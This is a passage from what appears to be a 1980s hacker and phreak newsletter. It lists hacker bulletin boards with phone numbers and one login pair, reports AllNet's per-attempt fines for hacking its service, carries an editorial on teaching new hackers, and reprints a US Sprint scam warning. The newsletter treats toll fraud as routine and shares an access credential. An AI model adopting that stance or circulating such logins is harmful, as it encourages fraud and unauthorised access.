and by his local Sheriff. No charges have been filed as of this date. He 
says he will be using a friend’s equipment to stay in touch with the world. 


Information Provided by Hatchet Molly 


Give These Boards A Call 


These systems have potential, but need good users, so give them a call, and 
help the world out. 


The Autobahn - The Outlet Private — 

703/629-4422 313/261-6141 

Primary -— ‘central’ newuser/kenwood 

Sysop - The Highwayman Sysop — Ax Murderer 

Hack/Phreak Private Hack/Phreak 

Dallas Hack Shack - The Forgotten Realm - 
214/422-4307 618/943-2399 

Apply For Access Apply For Access 

Sysop - David Lightman Sysop - Crimson Death 

Private Hack/Phreak Private H/P & Phrack Headquarters 


AllNet Hacking Is Getting Expensive 


For those of you who hack AllNet Long Distance Service, watch out. Al1Net 
Communications Corp. has announced that they will be charging $500.00 PER 
ATTEMPT to hack their service. That’s not PER VALID CODE, that’s PER ATTEMPT. 
Sources say that The Fugitive (619) received a $200,000.00 phone bill from 
AllNet. 


11.txt Wed Apr 26 09:43:37 2017 2 


This may set examples for other long distance communication carriers in the 
future, so be careful what you do. 


Editorial - What Is The Best Way To Educate New Hackers? 


Since the "demise" of Phreak Klass 2600 and PLP, the H/P world has not seen a 
board dedicated to the education of new hackers. Although PK2600 is still up 
(806/799-0016, educate) many of the old "teachers" never call. The board has 
fallen mainly to new hackers who are looking for teachers. This may pose a 
problem. If boards aren’t the way to educate these people (I think they are 
the best way, in fact), then what is? Certainly not giant Alliance 
conferences as in the past, due to recent "black-listing" of many "conferees" 
who participated heavily in Alliance Teleconferencing in the past. 


I think it might be successful if someone was able to set up another board 
dedicated to teaching new hackers. A board which is not private, but does 
voice validate the users as they login. Please leave some feedback as to what 
you think of this idea, or if you are willing to set this type of system up. 
Thanks. 


US Sprint Employee Scam 


The US Sprint Security Department is currently warning employees of a scam 
which could be affecting them. An unidentified man has been calling various 
employees throughout the US Sprint system and telling them that if they give 
him their FON Card numbers, they will receive an additional US Sprint employee 
long-distance credit. The Security Department says, "this is a 100 percent 
scam." "If you’re called to take part in this operation, please call the 
Security Department at (816) 822-6217." 


Information Provided By US Sprint 


